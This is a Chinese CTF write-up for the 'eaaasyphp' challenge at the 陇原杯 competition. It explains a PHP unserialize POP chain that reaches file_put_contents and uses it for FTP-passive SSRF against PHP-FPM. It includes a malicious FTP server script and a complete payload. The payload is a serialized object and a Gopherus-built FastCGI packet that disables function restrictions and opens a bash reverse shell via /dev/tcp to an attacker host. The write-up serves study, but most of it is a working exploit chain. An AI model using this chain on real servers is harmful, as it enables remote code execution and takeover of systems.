陇原杯 eaaasyphp

Posted 2021-12-19 k_du1t

1NDEX

• 0x00 前言
• 0x01 复现
• • 开始扫盲
  • brain.md
  • • 关于php-fpm
  • 补一篇gopher
• 0x02 rethink

0x00 前言

比赛的时候一会写出个pop链，一发就500直接崩溃
后面才知道没有写权限也会这样（一开始以为自己🐖👃链子写错了—）
看了师傅们的wp才知道还是自己太菜🌶
知识点：FTP SSRF 打穿内网
注：php7.2.20已修复__wakeup逃逸
一开始想用hint看phpinfo来着 __wakup行不通
bypass比较方便

先看个phpinfo

API属于是惹眼了

0x01 复现

贴上源码和师傅的精简pop
学习一下别人的链子为什么写的比你好？！

<?php
class Check 
    public static $str1 = false;
    public static $str2 = false;

class Esle 
    public function __wakeup()
    
	    Check::$str1 = true;
    

class Bypass 

    public function __destruct()
    
        if (Check::$str1) 
            ($this->str4)();
         
        
    

class Welcome 
    public function __invoke()
    
        Check::$str2=true;
	return "Welcome" . $this->username;
    

class Bunny 
    public function __toString()
    
        if (Check::$str2) 
            if(!$this->data)
                $this->data = $_REQUEST['data'];
            
            file_put_contents($this->filename, $this->data);
         else 
            throw new Error("Error");
        
    

class Hint 

    public function __wakeup()
        $this->hint = "no hint";
    

    public function __destruct()
        if(!$this->hint)
            $this->hint = "phpinfo";
            ($this->hint)();
        
    

$a=new Esle();
$b=new Bypass();
$b->str4=new Welcome;
$b->str4->username=new Bunny();
$b->str4->username->filename="daidai.php";
$c=serialize([$a,$b]);
echo $c;
?>

data传shell
看到dl这边也卡住了 我不是一个人

开始扫盲

师傅文章

https://whoamianony.top/2021/10/24/Web%E5%AE%89%E5%85%A8/%E6%95%99%E4%BD%A0%E7%94%A8%20FTP%20SSRF%20%E6%89%93%E7%A9%BF%E5%86%85%E7%BD%91/

这篇更详细一点

https://whoamianony.top/2021/05/15/Web%E5%AE%89%E5%85%A8/%E6%B5%85%E5%85%A5%E6%B7%B1%E5%87%BA%20Fastcgi%20%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B8%8E%20PHP-FPM%20%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/

拾人牙慧了属于是 (字比较丑

tips:被动模式下，FTP Server能指定客户端连接的地址和端口
将127.0.0.1:9000作为目标实现ssrf打击php-fpm
适用于没有写权限的环境

公网VPS起个恶意ftp

FTP 和 HTTP 类似，协议内容全是纯文本
ftp状态码
https://www.cnblogs.com/dongiosblogs/p/4548770.html

# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\\n')  #220 服务就绪，可以执行新用户的请求。
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\\n') # 331 用户名正确，需要密码
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\\n') #命令确定
#Size /
conn.send(b'550 Could not get the file size.\\n')  # 550 未执行请求的操作。文件不可用（例如，未找到文件，没有访问权限）
#EPSV (1)
conn.send(b'150 ok\\n') #150 文件状态正常，准备打开数据连接。
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\\n') #STOR / (2) 227 进入被动模式 (h1,h2,h3,h4,p1,p2)。
conn.send(b'150 Permission denied.\\n')
#QUIT
conn.send(b'221 Goodbye.\\n')
conn.close()

payload使用gopherus生成
这里用脚本了，没办法，我是彩笔(之后补上）
file_put_contents($this->filename, $this->data);
filename=ftp://aaa@x.x.x.x(VPS):23/123
data= gopherus->生成的payload
取 _ 后面的部分

brain.md

file_put_contents(ftp://aaa@x.x.x.x(VPS):23/123,gopherus->生成的payload)
注意灵活使用协议
这样靶机先连到恶意FTP服务器
后来FTP服务器告诉靶机去连接(127.0.0.1:9000)，然后gopherus生成的恶意payload当作data发送至靶机的127.0.0.1:9000，也就是向靶机的php-fpm发送恶意数据包–>执行代码–>ssrf
FTP服务器起到重定向payload的作用
vps起恶意FTP 开监听 上poc


Done!
payload

?code=a:2:i:0;O:4:"Esle":0:i:1;O:6:"Bypass":1:s:4:"str4";O:7:"Welcome":1:s:8:"username";O:5:"Bunny":1:s:8:"filename";s:27:"ftp://aaa@xxx:23/123";&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH102%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00f%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/xxx/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00%0A%27%29%3B%3F%3E%00%00%00%00

关于php-fpm

几篇好的基础文章

https://www.cnblogs.com/followyou/p/9460058.html
https://blog.csdn.net/weixin_39664643/article/details/114977217

补一篇gopher

师傅讲的很好

https://zhuanlan.zhihu.com/p/112055947

参考文章

https://blog.csdn.net/weixin_44502336/article/details/121210310

0x02 rethink

属于是🕊怪了
之前一直在打美亚,ctf停滞了
看到同龄师傅们都tql，留下了羡慕的泪水
以后每场都要好好复现